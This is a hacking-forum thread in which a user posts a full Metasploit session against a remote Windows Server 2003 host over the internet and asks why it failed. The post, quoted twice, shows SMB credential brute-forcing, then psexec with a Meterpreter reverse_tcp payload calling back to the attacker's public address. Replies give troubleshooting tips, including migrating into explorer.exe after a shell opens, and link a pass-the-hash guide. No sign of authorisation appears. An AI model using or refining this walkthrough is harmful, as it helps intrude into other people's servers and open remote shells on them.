Jump to content

Can You Let Me Know What Is The Problem With This Exploit?


mbarakoda
 Share

Recommended Posts

Target OS: Windows 2003 SP2 EN

Target public ip : XX.XX.XX.XX

Target Open port: 445

My OS: windows 7

My public ip : YY.YY.YY.YY

my local ip: 192.168.2.42

my router SMC

Due to the fact that the target is not on the same LAN, and the attach will be over the internet, i start with setting port forward from router settings as the following:

Name:AUTH - Protocol:TCP/UDP - WAN Port:4444 - Server Host Port:4444 - Server IP Address 192.168.2.42

I installed metasploit and start with checking if the credentials are valid or not by running scanner/smb/smb_login as following

msf> use scanner/smb/smb_login

msf auxiliary(smb_login) > set rhosts XX.XX.XX.XX

rhosts => XX.XX.XX.XX

msf auxiliary(smb_login) > set smbuser root

smbuser => root

msf auxiliary(smb_login) > set smbpass password

smbpass => password

msf auxiliary(smb_login) > run

[*] XX.XX.XX.XX:445 SMB - Starting SMB login bruteforce

[-] XX.XX.XX.XX - This system allows guest sessions with any credentials, these instances will not be reported.

[-] XX.XX.XX.XX:445 SMB - [1/3] - |WORKGROUP - FAILED LOGIN (Windows Server 2003 3790 Service Pack 2) root : (STATUS_LOGON_FAILURE)

[-] XX.XX.XX.XX:445 SMB - [2/3] - |WORKGROUP - FAILED LOGIN (Windows Server 2003 3790 Service Pack 2) root : root (STATUS_LOGON_FAILURE)

[*] Auth-User: "root"

[+] XX.XX.XX.XX:445|WORKGROUP - SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2) 'root' : 'password'

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

then after login successful, i try to use exploit/windows/smb/psexec to exploit the server by the following:

msf > use exploit/windows/smb/psexec

msf exploit(psexec) > set rhost XX.XX.XX.XX

rhost => XX.XX.XX.XX

msf exploit(psexec) > set smbuser root

smbuser => root

msf exploit(psexec) > set smbpass password

smbpass => password

msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(psexec) > set lhost YY.YY.YY.YY

lhost => YY.YY.YY.YY

msf exploit(psexec) > set lport 4444

lport => 4444

msf exploit(psexec) > exploit

[-] Handler failed to bind to YY.YY.YY.YY:4444

[*] Started reverse handler on 0.0.0.0:4444

[*] Connecting to the server...

[*] Authenticating to XX.XX.XX.XX:445|WORKGROUP as user 'root'...

[*] Uploading payload...

[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=117 WordCount=0)

but as you see the exploit failed although the credentials are valid and confirmed above, can you help me understand what's wrong on the above?

Link to comment
Share on other sites

It could be that the vulnerability is already patched.

Link to comment
Share on other sites

[-] Handler failed to bind to YY.YY.YY.YY:4444

Whats running locally already on 4444?

Also, what OS is the target? Windows, or Linux runnung SMB? User root on a windows box seems unlikely, where as I could see it on a linux machine running samba, which if you think about it, I don't think psexec works on linux as a payload, but I could be wrong..

If you got a shell popped, try migrating to a process like explorer.exe and then see where or what your commands are/can do.

Link to comment
Share on other sites

Target OS: Windows 2003 SP2 EN

Target public ip : XX.XX.XX.XX

Target Open port: 445

My OS: windows 7

My public ip : YY.YY.YY.YY

my local ip: 192.168.2.42

my router SMC

Due to the fact that the target is not on the same LAN, and the attach will be over the internet, i start with setting port forward from router settings as the following:

Name:AUTH - Protocol:TCP/UDP - WAN Port:4444 - Server Host Port:4444 - Server IP Address 192.168.2.42

I installed metasploit and start with checking if the credentials are valid or not by running scanner/smb/smb_login as following

msf> use scanner/smb/smb_login

msf auxiliary(smb_login) > set rhosts XX.XX.XX.XX

rhosts => XX.XX.XX.XX

msf auxiliary(smb_login) > set smbuser root

smbuser => root

msf auxiliary(smb_login) > set smbpass password

smbpass => password

msf auxiliary(smb_login) > run

[*] XX.XX.XX.XX:445 SMB - Starting SMB login bruteforce

[-] XX.XX.XX.XX - This system allows guest sessions with any credentials, these instances will not be reported.

[-] XX.XX.XX.XX:445 SMB - [1/3] - |WORKGROUP - FAILED LOGIN (Windows Server 2003 3790 Service Pack 2) root : (STATUS_LOGON_FAILURE)

[-] XX.XX.XX.XX:445 SMB - [2/3] - |WORKGROUP - FAILED LOGIN (Windows Server 2003 3790 Service Pack 2) root : root (STATUS_LOGON_FAILURE)

[*] Auth-User: "root"

[+] XX.XX.XX.XX:445|WORKGROUP - SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2) 'root' : 'password'

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

then after login successful, i try to use exploit/windows/smb/psexec to exploit the server by the following:

msf > use exploit/windows/smb/psexec

msf exploit(psexec) > set rhost XX.XX.XX.XX

rhost => XX.XX.XX.XX

msf exploit(psexec) > set smbuser root

smbuser => root

msf exploit(psexec) > set smbpass password

smbpass => password

msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(psexec) > set lhost YY.YY.YY.YY

lhost => YY.YY.YY.YY

msf exploit(psexec) > set lport 4444

lport => 4444

msf exploit(psexec) > exploit

[-] Handler failed to bind to YY.YY.YY.YY:4444

[*] Started reverse handler on 0.0.0.0:4444

[*] Connecting to the server...

[*] Authenticating to XX.XX.XX.XX:445|WORKGROUP as user 'root'...

[*] Uploading payload...

[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=117 WordCount=0)

but as you see the exploit failed although the credentials are valid and confirmed above, can you help me understand what's wrong on the above?

I found something related to your problem, I don't know if you have seen it or not, but here's the URL.

http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...